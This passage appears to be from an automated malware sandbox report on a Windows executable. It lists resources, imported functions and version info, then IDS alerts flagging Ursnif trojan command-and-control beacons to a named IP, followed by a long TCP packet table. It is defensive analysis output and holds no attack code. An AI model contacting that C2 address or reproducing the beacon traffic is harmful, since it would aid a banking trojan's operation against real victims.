RT_ICON | 0x67228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States |
RT_ICON | 0x697d0 | 0xea8 | data | English | United States |
RT_ICON | 0x6a678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States |
RT_ICON | 0x6af20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States |
RT_DIALOG | 0x6b488 | 0xb4 | data | English | United States |
RT_DIALOG | 0x6b540 | 0x120 | data | English | United States |
RT_DIALOG | 0x6b660 | 0x158 | data | English | United States |
RT_DIALOG | 0x6b7b8 | 0x202 | data | English | United States |
RT_DIALOG | 0x6b9c0 | 0xf8 | data | English | United States |
RT_DIALOG | 0x6bab8 | 0xa0 | data | English | United States |
RT_DIALOG | 0x6bb58 | 0xee | data | English | United States |
RT_GROUP_ICON | 0x6bc48 | 0x4c | data | English | United States |
RT_VERSION | 0x6bc98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States |
DLL | Import |
---|---|
KERNEL32.dll | EraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak |
OLEAUT32.dll | GetRecordInfoFromTypeInfo, LoadTypeLibEx |
USER32.dll | DefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo |
GDI32.dll | ExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment |
ADVAPI32.dll | EnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA |
msvcrt.dll | strcoll, fgetwc, srand |
Description | Data |
---|---|
LegalCopyright | A Company. All rights reserved. |
InternalName | |
FileVersion | 1.0.0.0 |
CompanyName | A Company |
ProductName | |
ProductVersion | 1.0.0.0 |
FileDescription | |
OriginalFilename | myfile.exe |
Translation | 0x0409 0x04b0 |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
05/04/22-16:27:54.122082 05/04/22-16:27:54.122082 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
05/04/22-16:27:53.231327 05/04/22-16:27:53.231327 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
05/04/22-16:27:53.642851 05/04/22-16:27:53.642851 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
05/04/22-16:27:33.120656 05/04/22-16:27:33.120656 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49760 | 80 | 192.168.2.4 | 13.107.43.16 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 4, 2022 16:27:53.212703943 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.229989052 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.230151892 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.231327057 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.248414040 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.534866095 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.534919977 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.534966946 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.534984112 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.535002947 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.535007954 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.535043955 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.535058022 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.535069942 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.535089970 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.535105944 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.535140991 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.535150051 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.535165071 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.535206079 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.535248995 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.535300016 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.535312891 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.535350084 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.535361052 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.535375118 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.535397053 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.535409927 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.535456896 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.552704096 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.552772999 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.552818060 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.552848101 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.552889109 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.552930117 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.552931070 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.552967072 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.552967072 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553004980 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.553009033 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553046942 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553076029 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553114891 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553153992 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553158045 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.553183079 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553217888 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.553225994 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553267956 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553271055 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.553298950 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553302050 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.553318024 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.553338051 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553379059 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553400993 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.553409100 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553436041 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.553447008 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553486109 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553498030 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.553514004 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553534031 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.553555965 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553599119 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553606033 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.553649902 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.553690910 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553807020 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553848982 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553863049 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.553879023 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.553915977 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.554440975 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.554519892 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.570719004 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.570779085 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.570816994 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.570862055 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.570903063 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.570933104 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.570971012 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571021080 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571029902 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.571050882 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571090937 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.571101904 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571151018 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571155071 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.571188927 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571219921 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571260929 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571269035 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.571300030 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571307898 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.571341038 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571369886 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571386099 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.571408033 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571448088 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571450949 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.571487904 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571517944 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571530104 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.571577072 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571593046 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.571615934 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571656942 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571656942 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.571696043 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571707964 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.571724892 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571763992 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571763992 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.571804047 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571810961 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.571846008 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571887016 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.571887970 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571899891 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.571913958 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571953058 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.571974993 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.571994066 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572032928 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572046995 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.572072983 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572089911 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.572101116 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572140932 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572150946 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.572182894 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572222948 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572223902 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.572263002 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572273016 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.572290897 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572314024 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.572329998 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572364092 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.572369099 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572407007 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.572407961 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572448015 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572453022 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.572506905 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572506905 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.572546959 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.572565079 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572604895 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572642088 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.572645903 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572684050 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.572685957 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572711945 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572726965 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.572751999 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.572784901 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.572830915 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.589708090 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.589749098 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.589780092 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.589809895 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.589833021 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.589860916 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.589904070 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.589931965 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.589935064 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.589962006 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.589972973 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.589982986 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590065002 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.590138912 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590168953 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590210915 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.590253115 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590281963 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590298891 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.590303898 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590307951 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.590334892 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590365887 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590394974 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590419054 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.590424061 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590437889 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.590440989 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.590452909 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590483904 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590488911 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.590504885 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590534925 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590553999 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.590564966 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590594053 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590606928 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.590624094 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590655088 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590672016 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.590683937 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590703964 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590733051 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590735912 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.590761900 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590792894 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590821981 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590832949 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.590851068 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590881109 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590889931 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.590903044 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590929985 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.590931892 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590960979 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.590991020 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591021061 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591022015 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.591049910 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591079950 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591101885 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.591121912 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591151953 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591164112 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.591175079 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591203928 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.591204882 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591233969 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591264963 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591269970 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.591293097 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591322899 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591336012 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.591351986 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591379881 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591389894 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.591411114 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591433048 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591444969 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.591463089 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591475010 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.591538906 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.591538906 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591563940 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591593981 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591624022 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591624975 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.591653109 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591682911 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591694117 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.591713905 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591742039 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591770887 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591773033 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.591800928 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591804981 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.591823101 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
